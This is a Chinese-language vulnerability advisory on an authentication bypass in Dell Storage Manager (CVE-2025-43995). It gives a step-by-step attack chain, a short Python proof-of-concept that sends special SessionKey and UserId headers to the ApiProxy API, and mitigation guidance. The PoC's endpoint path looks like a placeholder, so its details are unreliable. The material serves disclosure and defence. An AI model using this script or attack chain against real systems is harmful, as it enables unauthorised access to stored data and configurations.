CVE-2025-43995: Dell Storage Manager 认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-43995

漏洞类型

认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Dell Storage Center, Dell Storage Manager

漏洞概述

CVE-2025-43995是Dell Storage Manager中的一个严重认证绕过漏洞，CVSS评分高达9.8分（严重级别）。该漏洞影响Dell Storage Manager 20.1.21版本，存在于DSM Data Collector组件中。漏洞根源在于ApiProxy.war模块中暴露的API接口存在不正确的身份验证机制。未经认证的远程攻击者可以通过使用特殊的SessionKey和UserId来访问DataCollectorEar.ear中由ApiProxy.war暴露的API。这些特殊的userid是compellentservicesapi中为特殊目的预先创建的系统账户。由于攻击者无需任何身份凭证即可利用此漏洞，因此可以完全绕过系统的认证保护机制，访问本应受保护的API接口，进而可能导致敏感数据泄露或系统完整性被破坏。此漏洞无需用户交互即可被利用，对系统的机密性、完整性和可用性都造成严重影响。

技术细节

该漏洞是由于Dell Storage Manager的Data Collector组件中ApiProxy.war模块存在不正确的身份验证实现。攻击者利用预先存在于compellentservicesapi中的特殊用户账户（具有特定的SessionKey和UserId组合），可以绕过正常的认证流程直接访问受保护的API接口。攻击者通过网络发送特制的HTTP请求，包含这些特殊的会话密钥和用户ID，即可获得未授权的系统访问权限。由于认证检查机制存在缺陷，系统未能正确验证这些特殊凭证的合法性，导致攻击者可以执行本应需要管理员权限的操作。攻击者可能利用此漏洞进行横向移动，访问存储系统中的敏感数据，或者修改系统配置导致服务中断。漏洞的利用不需要目标系统存在任何已知的前置条件，属于最严重的安全缺陷类型。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统中运行的Dell Storage Manager版本，确认版本为20.1.21并确定ApiProxy.war接口的访问地址

STEP 2

步骤2: 获取特殊凭证

攻击者获取compellentservicesapi中预设的特殊SessionKey和UserId，这些凭证本用于系统内部特殊功能

STEP 3

步骤3: 构造认证绕过请求

攻击者构造HTTP请求，在请求头中包含特殊的SessionKey和UserId，绕过正常的用户名密码认证流程

STEP 4

步骤4: 发送恶意请求

通过POST请求访问DataCollectorEar.ear中暴露的API接口，利用不正确的认证检查机制获取未授权访问权限

STEP 5

步骤5: 权限提升与数据访问

成功绕过认证后，攻击者可以访问存储系统的敏感数据、修改配置或执行其他高权限操作

STEP 6

步骤6: 持久化与横向移动

攻击者可能利用获取的访问权限进行持久化控制或在网络内部进行横向移动，扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-43995 PoC - Dell Storage Manager Authentication Bypass
# Target: Dell Storage Manager Data Collector (ApiProxy.war)

def exploit_dell_storage_manager(target_url, special_session_key, special_user_id):
    """
    Exploit for CVE-2025-43995: Dell Storage Manager Authentication Bypass
    
    Args:
        target_url: Base URL of Dell Storage Manager
        special_session_key: Special SessionKey from compellentservicesapi
        special_user_id: Special UserId for special purpose account
    
    Returns:
        Response from the exploited API endpoint
    """
    
    # Target the ApiProxy.war API endpoint
    api_endpoint = f"{target_url}/DataCollectorEar/ApiProxy/api/endpoint"
    
    # Construct headers with special authentication bypass credentials
    headers = {
        'Content-Type': 'application/json',
        'SessionKey': special_session_key,
        'UserId': special_user_id
    }
    
    # Payload to access protected API without proper authentication
    payload = {
        'action': 'listStorageCenters',
        'options': {}
    }
    
    try:
        print(f"[*] Targeting: {api_endpoint}")
        print(f"[*] Using SessionKey: {special_session_key}")
        print(f"[*] Using UserId: {special_user_id}")
        
        # Send crafted request to bypass authentication
        response = requests.post(api_endpoint, json=payload, headers=headers, timeout=30)
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        if response.status_code == 200:
            print("[+] Authentication bypass successful!")
            return True
        else:
            print("[-] Authentication bypass failed or unexpected response")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve_2025_43995_poc.py <target_url> <session_key> <user_id>")
        print("Example: python cve_2025_43995_poc.py https://dell-sm.example.com 'SPECIAL_KEY' 'SPECIAL_UID'")
        sys.exit(1)
    
    target = sys.argv[1]
    session_key = sys.argv[2]
    user_id = sys.argv[3]
    
    exploit_dell_storage_manager(target, session_key, user_id)

影响范围

Dell Storage Manager 20.1.21

Dell Storage Center (关联版本)

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 通过防火墙或ACL规则限制对Dell Storage Manager Data Collector端口的访问，仅允许管理终端IP访问；2) 启用详细的审计日志并实时监控API访问记录，检测异常的认证绕过行为；3) 将存储系统网络与业务网络实施物理隔离；4) 部署入侵检测/防御系统（IDS/IPS）监控针对ApiProxy接口的可疑请求；5) 定期备份存储配置和重要数据，确保在遭受攻击后能够快速恢复；6) 监控Dell官方安全公告，及时获取最新的安全更新信息。